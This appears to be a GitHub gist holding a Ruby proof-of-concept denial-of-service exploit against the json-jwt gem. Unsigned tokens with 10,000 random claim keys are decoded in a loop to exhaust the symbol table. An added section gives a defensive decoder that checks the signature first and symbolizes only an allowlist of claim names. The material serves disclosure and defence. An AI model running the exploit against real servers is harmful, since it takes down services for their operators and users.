@stouset

stouset/dos.rb

Last active December 11, 2015 16:28
JSON::JWT DoS exploit
```ruby
require 'json/jwt'

p GC.stat # note heap_used, heap_length, and particularly heap_live_num

random = Random.new
key    = random.bytes(256 / 8)

10_000.times do
  # construct a hash with 10_000 garbage keys; they can be strings here and the
  # JWT decoder will happily convert them to symbols regardless
  claims = 10_000.times.each_with_object({}) do |_, h|
    h[random.bytes(16)] = 1
  end

  # convert it to a JWT; they don't even have to be signed, because the decoder
  # converts string keys to symbols before even validating the JWT
  jwt = JSON::JWT.new(claims)

  # we swallow errors because, in practice, an attacker can just repeatedly hit
  # your webserver endpoint and ignore the fact that you've failed to decode the
  # JWT
  JSON::JWT.decode(jwt.to_s, key) rescue nil
end

# let the above run as long as you feel like
GC.start
p GC.stat # note heap_used, heap_length, and particularly heap_live_num
```
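A defensive counterpart, added here as an illustration and not part of the gist or of the json-jwt gem: verify the HS256 signature over the raw token segments before parsing anything, keep claim keys as Strings, cap the number of claims, and convert only registered claim names to symbols, so an unauthenticated token can never add a symbol to the table. The constant names, the MAX_CLAIMS bound and the hand-rolled base64url and HMAC helpers are assumptions made for this example.

```ruby
require 'json'
require 'openssl'

# Registered claim names (RFC 7519, section 4.1): the only keys we will ever
# turn into symbols. Everything else stays a String and is garbage-collected.
REGISTERED_CLAIMS = %w[iss sub aud exp nbf iat jti].freeze
# Constructed upper bound on claims per token; a real token needs far fewer.
MAX_CLAIMS = 64

def b64url_encode(bytes)
  [bytes].pack('m0').tr('+/', '-_').delete('=')
end

def b64url_decode(str)
  padded = str.tr('-_', '+/')
  padded += '=' * ((4 - padded.length % 4) % 4)
  padded.unpack1('m0') # strict decoding: raises ArgumentError on junk
end

# Constant-time byte comparison so the signature check does not leak timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Build an HS256 compact JWS; used here only to construct sample tokens.
def hs256_sign(claims, key)
  header  = b64url_encode(JSON.generate({ 'alg' => 'HS256', 'typ' => 'JWT' }))
  payload = b64url_encode(JSON.generate(claims))
  input   = "#{header}.#{payload}"
  "#{input}.#{b64url_encode(OpenSSL::HMAC.digest('SHA256', key, input))}"
end

# Verify first, parse second, symbolize last. Raises ArgumentError for any
# token that must not be trusted, before a single symbol has been created.
def decode_hs256_safely(token, key)
  header_b64, payload_b64, sig_b64 = token.split('.', 3)
  raise ArgumentError, 'malformed token' if sig_b64.nil?
  input    = "#{header_b64}.#{payload_b64}"
  expected = OpenSSL::HMAC.digest('SHA256', key, input)
  raise ArgumentError, 'bad signature' unless secure_equal?(b64url_decode(sig_b64), expected)
  header = JSON.parse(b64url_decode(header_b64)) # String keys, no symbols
  raise ArgumentError, 'unexpected header' unless header.is_a?(Hash) && header['alg'] == 'HS256'
  claims = JSON.parse(b64url_decode(payload_b64))
  raise ArgumentError, 'bad claims' unless claims.is_a?(Hash) && claims.size <= MAX_CLAIMS

  # Symbolize only the allowlisted names; unknown keys are left as Strings.
  claims.to_h { |k, v| [REGISTERED_CLAIMS.include?(k) ? k.to_sym : k, v] }
end
```

Ruby 2.2 and later garbage-collect symbols created by String#to_sym, which removes the permanent leak, but parsing and symbolizing 10,000 keys per unauthenticated request is still wasted work, so the signature-first ordering, the allowlist and the size bound remain worthwhile.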